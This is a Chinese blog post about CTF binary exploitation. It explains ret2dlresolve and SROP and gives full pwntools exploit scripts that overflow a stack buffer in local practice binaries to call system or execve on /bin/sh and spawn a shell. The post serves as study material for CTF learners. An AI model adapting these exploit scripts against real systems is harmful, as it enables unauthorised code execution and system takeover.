Ret2dlresolve、Srop

最新推荐文章于 2024-08-04 22:29:38 发布
最新推荐文章于 2024-08-04 22:29:38 发布
阅读量1.4k 收藏 36
点赞数 52
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66751120/article/details/136253528
版权

一、Ret2dlresolve

原理详解见https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/icon-default.png?t=N7T8https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/

直接通过题来介绍如何使用,及什么时候使用,和基于pwntools工具的攻击。

非常明显通过read函数的栈溢出,但是没有后门函数,也没有能够打印的函数,无法得到libc基址,

同时汇编代码中没有syscall指令,也就不能用ret2syscall的方法去做。

所以利用ret2dlresolve的方法去伪造read函数的got表,这里直接利用工具去伪造,由于很少见到这类问题,想学手动构造及深析原理的朋友可以去自行搜索。这里给出脚本,遇到相关问题时,改一下覆盖字节大小。

from pwn import *
p=process("./pwn64")
elf = context.binary = ELF('./pwn64')
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw(b'A' * (0x30+8))
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()

二、SROP

具体原理及解析分别见

SROP - CTF WikiCTF Wikiicon-default.png?t=N7T8https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/srop/

https://blog.csdn.net/qq_40827990/article/details/103633527?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522170988875316800211570130%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=170988875316800211570130&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-103633527-null-null.142^v99^pc_search_result_base6&utm_term=srop&spm=1018.2226.3001.4187icon-default.png?t=N7T8https://blog.csdn.net/qq_40827990/article/details/103633527?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522170988875316800211570130%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=170988875316800211570130&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-103633527-null-null.142^v99^pc_search_result_base6&utm_term=srop&spm=1018.2226.3001.4187接下来上题

这里发现有个显著的区别就是所调用的函数均是通过syscall调用

这里看到题中所给的rax为0xF的gadget,刚好满足srop所用函数sigreturn的条件。

然后看脚本

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./pwn')
p = process("./pwn")
def bug():
	gdb.attach(p)
	pause() 
vuln=0x4004ed
syscall=0x400517
gadgets=0x4004DA
payload=b'a'*0x10+p64(vuln)
bug()
p.sendline(payload)
stack=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(stack))

#伪造调用execve函数时寄存器信息
frame=SigreturnFrame()
#frame.rax=constants.SYS_execve #与下一行效果相同
frame.rax=0x3b        #64位execve的系统调用号
frame.rdi=stack-296   #/bin/sh的地址
frame.rsi=0
frame.rdx=0
frame.rip=syscall

payload=b'/bin/sh\x00'*2+p64(gadgets)+p64(syscall)+bytes(frame)  #伪造的寄存器信息发送时转化为字节
pause()
p.sendline(payload)
p.interactive()

 然后看一下伪造前后的效果

这里是即将执行syscall调用sigreturn,可以看到rax寄存器为0xf

这里是执行这个函数

最后伪造完成,没有修改的寄存器变为0,然后执行execve函数,从而getshell。

江屿..
关注
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2dlresolve,ret2srop
2302_79813730的博客
02-06 1034
那么如果我们可以控制相应的参数及其对应地址的内容是不是就可以控制解析的函数了呢?没有一个函数,也不是我们经常利用的read,write函数,这里只有一次发送机会,但我们要发送两次,第一次先将返回地址再改成vuln函数,第二次发送我们的rop链。主要是2,这个过程会rt_sigreturn函数进行还原,而且是根据栈中内容去还原,之后我们可以利用工具去伪造我们想要rop链。一般,我们也称其为软中断信号,或者软中断。首先,32位的 标志特别突出,只有read函数能栈溢出。的机制,我们可以构造一个假的。
Ret2dlresolvePayload使用
qq_45595732的博客
03-05 931
对于Ret2dlresolve,payload构造特别麻烦,但pwntools有相应的工具,其payload构造可以由Ret2dlresolvePayload来完成。(真香) help(pwnlib.rop.ret2dlresolve.Ret2dlresolvePayload) Help on class Ret2dlresolvePayload in module pwnlib.rop.ret2dlresolve: class Ret2dlresolvePayload(__builtin__.objec
浅析ret2dl_reslove
最新发布
2301_79327647的博客
08-04 1046
/Dynamic entry type(动态段标识号)union} d_un;//动态段起始地址//表示重定位所作用的虚拟地址或got表处的真实地址//这是一个复合值,包括了重定位类型和符号表下标其中我们需要记住r_info是一个复合值,其高32位表示该重定位项在动态链接符号表.dynsym中对应项的下标,低32位表示该重定位项的重定向类型。/* 符号名,符号在字符串表STRTAB中的偏移 *//* 符号类型及绑定属性 */
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 874
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 1079
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
ret2dlresolve以及srop
2301_81031055的博客
02-22 573
linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了。所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!这里我们可以直接通过脚本去获取权限。
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
C语言头文件 RETCODE
06-13
C语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言...RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RET
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 5300
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
ret2_dl_runtime_resolve高级栈溢出利用思路
a2590035252的博客
10-17 972
推荐给想和我一样深入理解动态链接过程的pwn师傅
pwntools使用第五弹——ret2dlresolve以及延迟绑定
小小鱼的博客
02-11 3603
简介 关于ret2dlresolve利用的原理,可以参考如下博文: https://www.freebuf.com/articles/system/170661.html ret2dlsolve的核心原理就是利用了延迟绑定技术,linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了,关于延
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 416
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
【pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3631
ret2dlreslove
ret2dlresolve利用方法
九层台
05-10 2384
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江屿..

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值